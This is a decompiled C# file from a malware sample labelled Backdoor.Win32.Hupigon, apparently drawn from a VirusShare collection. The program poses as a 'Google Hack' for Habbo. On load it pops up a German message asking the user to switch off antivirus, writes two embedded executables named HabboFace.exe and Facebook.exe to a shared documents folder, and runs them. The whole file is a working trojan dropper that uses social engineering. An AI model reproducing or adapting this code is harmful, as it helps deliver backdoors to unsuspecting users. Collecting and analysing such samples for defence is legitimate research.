Files
2022-08-18 06:28:56 -05:00

84 lines
2.8 KiB
C#

// Decompiled with JetBrains decompiler
// Type: Habbo.Form1
// Assembly: Google Hack, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 63AB6DF3-31D5-4D11-9D9E-6D98F624CDAB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Backdoor.Win32.Hupigon.eqlo-90417dbd8319c587650ad48b44dfe6abc92c86afce4f1b2bd44df0e9ed573bec.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace Habbo
{
[DesignerGenerated]
public class Form1 : Form
{
private static List<WeakReference> __ENCList = new List<WeakReference>();
private IContainer components;
[DebuggerNonUserCode]
static Form1()
{
}
[DebuggerNonUserCode]
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
lock (Form1.__ENCList)
Form1.__ENCList.Add(new WeakReference((object) this));
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(134, 163);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (Form1);
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = nameof (Form1);
this.ResumeLayout(false);
}
private void Form1_Load(object sender, EventArgs e)
{
int num1 = (int) Interaction.MsgBox((object) "Antivrus schutz aus bitte");
FileStream fileStream1 = new FileStream("C:\\Dokumente und Einstellungen\\All Users\\Dokumente/HabboFace.exe", FileMode.Create);
fileStream1.Write(Habbo.My.Resources.Resources.HabboFace, 0, Habbo.My.Resources.Resources.HabboFace.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream("C:\\Dokumente und Einstellungen\\All Users\\Dokumente/Facebook.exe", FileMode.Create);
fileStream2.Write(Habbo.My.Resources.Resources.Facebook, 0, Habbo.My.Resources.Resources.Facebook.Length);
fileStream2.Close();
int num2 = (int) Interaction.MsgBox((object) "Antivrus schutz aus bitte . Fertig");
Interaction.Shell("C:\\Dokumente und Einstellungen\\All Users\\Dokumente/Facebook.exe");
Interaction.Shell("C:\\Dokumente und Einstellungen\\All Users\\Dokumente/HabboFace.exe");
this.Close();
}
}
}